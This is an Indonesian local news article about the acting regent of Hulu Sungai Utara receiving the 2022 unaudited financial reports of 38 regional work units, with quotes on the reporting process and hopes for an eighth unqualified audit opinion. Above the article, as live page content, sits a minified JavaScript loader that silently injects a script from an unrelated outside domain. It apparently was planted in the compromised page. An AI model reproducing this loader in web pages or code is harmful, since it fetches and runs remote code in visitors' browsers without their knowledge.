(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Pj Bupati HSU Terima Laporan Keuangan 38 SKPD


KANALKALIMANTAN.COM, AMUNTAI – Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Raden Suria Fadliansyah mengatakan laporan keuangan sebagai pertanggungjawaban terakhir ketika melaksanakan kegiatan.

Hal itu diungkapkannya saat menerima penyerahan laporan keuangan tahun anggaran 2022 Unaudited dari 38 Satuan Kerja Perangkat Daerah (SKPD) di lingkup Pemerintah Kabupaten HSU yang digelar di Mess Nagara Dipa, Kamis (23/2/2023).

Lebih lanjut, Pj Bupati HSU Raden Suria Fadliansyah mengucapkan terima kasih kepada para hadirin yang telah menyelesaikan tugas laporan keuangannya.

Ia berharap kepada BPKAD dapat merangkum laporan – laporan keuangan tersebut,  jika misalnya ada yang tersisa/tercecer atau perbaikan yang cukup signifikan, agar sesegeranya diperbaiki.

 

Baca juga: Kabur Nyebur ke Sungai, Pelaku Penggelapan 2 Truk Akhirnya Dibekuk Macan Kalsel

“Dan ini tidak lain adalah untuk kepentingan kita bersama, karena ini adalah sebuah pertanggungjawaban terakhir ketika kita melaksanakan kegiatan di tahun 2022, mudah mudahan apa yang kita lakukan pada hari ini selalu mendapat ridho dari Allah SWT, ” imbuhnya.

Sementara itu, Kepala Badan Pengelola Keuangan Daerah (BPBPKADHSU, Rahman Heriadi dalam laporannya menyebut keuangan SKPD yang akan disampaikan tersebut terdiri dari laporan Realisasi Anggaran (RRA), neraca, Laporan Operasional(LO), Laporan Perubahan Ekuitas (LPE) dan Catatas Atas Laporan Keuangan (CALK).

“Laporan keuangan ini disampaikan kepada kepala daerah melalui Pejabat Pengelola Keuangan Daerah(PPKD) paling lambat 2 bulan setelah tahun anggaran berakhir. Sesuai dengan ketentuan peraturan perundang-undangan,” katanya.

Ia menambahkan, dalam penyusunan laporan keuangan instansi tersebut melalui beberapa tahapan. Dimulai dari proses entry data keuangan dan data aset kedalam sistem informasi manajemen.

“Dalam hal ini etnis dan Sistem Informasi Manajemen barang milik daerah (SIMDA BMD) oleh para bendahara pengeluaran, bendahara penerimaan, dan pengurus barang, ” imbuhnya.

Baca juga: Banjir Sungai Kemuning dan Cempaka, Ini ‘Biang’ Masalahnya Hasil Cek Lapangan Pemko Banjarbaru  

Lebih lanjut, berdasarkan laporan keuangan SKPD yang diserahkan pada hari ini akan digabung untuk disusun menjadi laporan keuangan Pemerintah Kabupaten HSU tahun 2022.

“Besar harapan kami bahwa opini hasil pemeriksaan BPK yang selama ini kita telah raih yaitu 7 kali berturut-turut Wajar Tanpa Pengecualian (WTP), semoga pada tahun ini kembali dapat kita raih untuk yang ke delapan kalinya, ” tutupnya.(kanalkalimantan.com/dew)

Reporter: dew
Editor: cell


Al Ghifari

Recent Posts

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

20 menit ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

1 jam ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

2 jam ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

3 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

3 jam ago

Ragam Kerajinan Rotan Merah Mejeng di Expo HUT ke-44 Dekranas

KANALKALIMANTAN.COM, SOLO - Kerajinan dari rotan merah menjadi salah satu primadona yang dihadirkan Dewan Kerajinan… Read More

3 jam ago

This website uses cookies.